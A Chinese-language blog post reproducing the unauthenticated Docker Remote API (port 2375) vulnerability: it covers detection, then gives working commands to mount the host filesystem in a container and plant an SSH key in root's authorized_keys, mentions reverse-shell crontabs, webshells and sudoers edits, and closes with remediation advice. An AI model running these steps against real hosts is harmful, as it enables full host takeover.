

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/sun2.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="Docker Remote API未授权访问漏洞复现漏洞简述Docker Remote API 是一个取代远程命令行界面（rcli）的REST API。 存在问题的版本分别为 1.3 和 1.6 。因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过这个接口，攻击者可以新建 container，删除已有 container，甚至是获取宿主">
<meta property="og:type" content="article">
<meta property="og:title" content="Docker Remote API未授权访问漏洞复现">
<meta property="og:url" content="http://example.com/2023/03/27/Docker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="人间小太阳">
<meta property="og:description" content="Docker Remote API未授权访问漏洞复现漏洞简述Docker Remote API 是一个取代远程命令行界面（rcli）的REST API。 存在问题的版本分别为 1.3 和 1.6 。因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过这个接口，攻击者可以新建 container，删除已有 container，甚至是获取宿主">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327141536700.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327141912887.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327140317363.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327140725830.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327143628715.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327144716007.png">
<meta property="og:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327145627609.png">
<meta property="article:published_time" content="2023-03-27T05:44:51.000Z">
<meta property="article:modified_time" content="2023-03-28T02:29:08.845Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327141536700.png">
  
  
  
  <title>Docker Remote API未授权访问漏洞复现 - 人间小太阳</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.0","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>人间小太阳&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Docker Remote API未授权访问漏洞复现"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-03-27 13:44" pubdate>
          2023年3月27日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          15 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Docker Remote API未授权访问漏洞复现</h1>
            
            <div class="markdown-body">
              
              <h1 id="Docker-Remote-API未授权访问漏洞复现"><a href="#Docker-Remote-API未授权访问漏洞复现" class="headerlink" title="Docker Remote API未授权访问漏洞复现"></a>Docker Remote API未授权访问漏洞复现</h1><h2 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="漏洞简述"></a>漏洞简述</h2><p>Docker Remote API 是一个取代远程命令行界面（rcli）的REST API。 存在问题的版本分别为 1.3 和 1.6 。因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过这个接口，攻击者可以新建 container，删除已有 container，甚至是获取宿主机的 shell。</p>
<h2 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h2><p>因为在使用此 Docker Remote API 时会默认开放2375端口，因此当用<code>nmap</code>探测发现目标机器开放了2375端口时，可以用如下方法进行探测是否存在未授权访问漏洞。</p>
<p>方法1：使用<code>-H</code>参数连接目标主机的docker，使用<code>ps</code>命令查询目标系统运行的镜像，若有回显，则存在未授权访问漏洞。</p>
<p>测试语句：</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">docker -H tcp://<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>:<span class="hljs-number">2375</span> ps  # 列出所有容器<br></code></pre></td></tr></table></figure>

<p><img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327141536700.png" srcset="/img/loading.gif" lazyload alt="image-20230327141536700"></p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">docker -H tcp://<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>.<span class="hljs-keyword">x</span>:<span class="hljs-number">2375</span> images  # 列出所有镜像<br></code></pre></td></tr></table></figure>

<img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327141912887.png" srcset="/img/loading.gif" lazyload alt="image-20230327141912887" style="zoom:80%;">

<p>方法2：直接访问<code>http://your-ip:2375/version</code>，若能访问，证明存在未授权访问漏洞。</p>
<p><img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327140317363.png" srcset="/img/loading.gif" lazyload alt="image-20230327140317363"></p>
<p>同时，访问<code>http://ip:2375/v1.23/containers/json</code>会列出容器信息，效果等同于命令<code>docker ps -a</code></p>
<p><img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327140725830.png" srcset="/img/loading.gif" lazyload alt="image-20230327140725830"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="写入SSH公钥法"><a href="#写入SSH公钥法" class="headerlink" title="写入SSH公钥法"></a>写入SSH公钥法</h3><p>首先，使用 docker 命令创建一个 busybox 容器，并将宿主机的磁盘挂载到容器中。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">docker -H tcp:<span class="hljs-regexp">//</span>x.x.x.x:<span class="hljs-number">2375</span> run -it -v <span class="hljs-regexp">/:/m</span>nt busybox chroot /mnt sh<br></code></pre></td></tr></table></figure>

<p><img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327143628715.png" srcset="/img/loading.gif" lazyload alt="image-20230327143628715"></p>
<p>然后，将攻击者SSH公钥<code>~/.ssh/id_rsa.pub</code>的内容写入到容器内的<code>/root/.ssh/authorized_keys</code>文件下（因为已经进行了挂载，所以写入到容器内目录下等同于写入到宿主机下）。</p>
<p>（1）本地获取SSH公钥</p>
<p>创建公钥&#x2F;私钥对 ssh-keygen</p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs lasso">$ ssh<span class="hljs-params">-keygen</span><br>Generating <span class="hljs-keyword">public</span>/<span class="hljs-keyword">private</span> rsa key <span class="hljs-built_in">pair</span>.<br><span class="hljs-params">...</span><br>$ ls<br>id_rsa  id_rsa.pub  known_hosts<br></code></pre></td></tr></table></figure>

<p>（2）将公钥复制到被攻击者的<code>/root/.ssh/authorized_keys</code>文件中</p>
<p><img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327144716007.png" srcset="/img/loading.gif" lazyload alt="image-20230327144716007"></p>
<p>复制好之后，就可以利用攻击机 kali 远程连接服务器 <code>ssh root@ip</code></p>
<img src="https://typora-note--image.oss-cn-hangzhou.aliyuncs.com/img/image-20230327145627609.png" srcset="/img/loading.gif" lazyload alt="image-20230327145627609" style="zoom:80%;">

<h3 id="其他方法"><a href="#其他方法" class="headerlink" title="其他方法"></a>其他方法</h3><p>还可以通过写入crontab定时任务来反弹shell，可以参考如下文章</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>www.cnblogs.com<span class="hljs-regexp">/-mo-/</span>p/<span class="hljs-number">11529387</span>.html<br>https:<span class="hljs-regexp">//</span>juejin.cn<span class="hljs-regexp">/post/</span><span class="hljs-number">7022625487398633502</span><span class="hljs-comment">#heading-4</span><br></code></pre></td></tr></table></figure>

<h2 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h2><ol>
<li><p>修改Docker Remote API服务默认参数 （需要重启Docker服务才能生效）</p>
<p>修改Docker的启动参数，定位到DOCKER_OPTS中的“tcp:&#x2F;&#x2F;0.0.0.0:2375”，将“0.0.0.0”修改为“127.0.0.1”，或将默认端口2375改为自定义端口。</p>
</li>
<li><p>为Remote API设置认证措施 （需要重启Docker服务才能生效）</p>
<p>参照官方文档配置Remote API的认证措施。详情见：<a target="_blank" rel="noopener" href="https://docs.docker.com/engine/reference/api/docker_remote_api/#authentication">https://docs.docker.com/engine/reference/api/docker_remote_api/#authentication</a></p>
</li>
<li><p>修改Docker服务运行账号 （需要重启Docker才能生效）</p>
<p>以较低权限账号运行Docker服务。另外可以限制攻击者执行高危命令。</p>
</li>
<li><p>设置防火墙策略</p>
<p>如果正常业务中API服务需要被其他服务器来访问，可以设置iptables策略仅允许指定的IP来访问Docker接口。</p>
</li>
</ol>
<h2 id="相关总结"><a href="#相关总结" class="headerlink" title="相关总结"></a>相关总结</h2><ol>
<li>所有姿势的前提是需要 Docker 以 root 权限运行。</li>
<li>Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录，可以参考 Redis 未授权访问漏洞，将宿主机的&#x2F;root&#x2F;.ssh目录挂载到容器上，然后写入公钥。如果有web目录的话，最差也能上一个webshell。</li>
<li>有些服务器不允许root登录，可以写入其他用户的.ssh&#x2F;目录下（通过查看<code>/etc/ssh/sshd_config</code>目录），然后修改<code>/etc/sudoers</code>中的文件，配置为 sudo 免密码，切换为root。</li>
</ol>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-chain-item">漏洞复现</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/08/05/Go%E8%AF%AD%E8%A8%80%E7%9A%84%E7%89%B9%E6%80%A7%E5%8F%8A%E5%8F%91%E5%B1%95%E5%89%8D%E6%99%AF/" title="Go语言的特性及发展前景">
                        <span class="hidden-mobile">Go语言的特性及发展前景</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>






  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
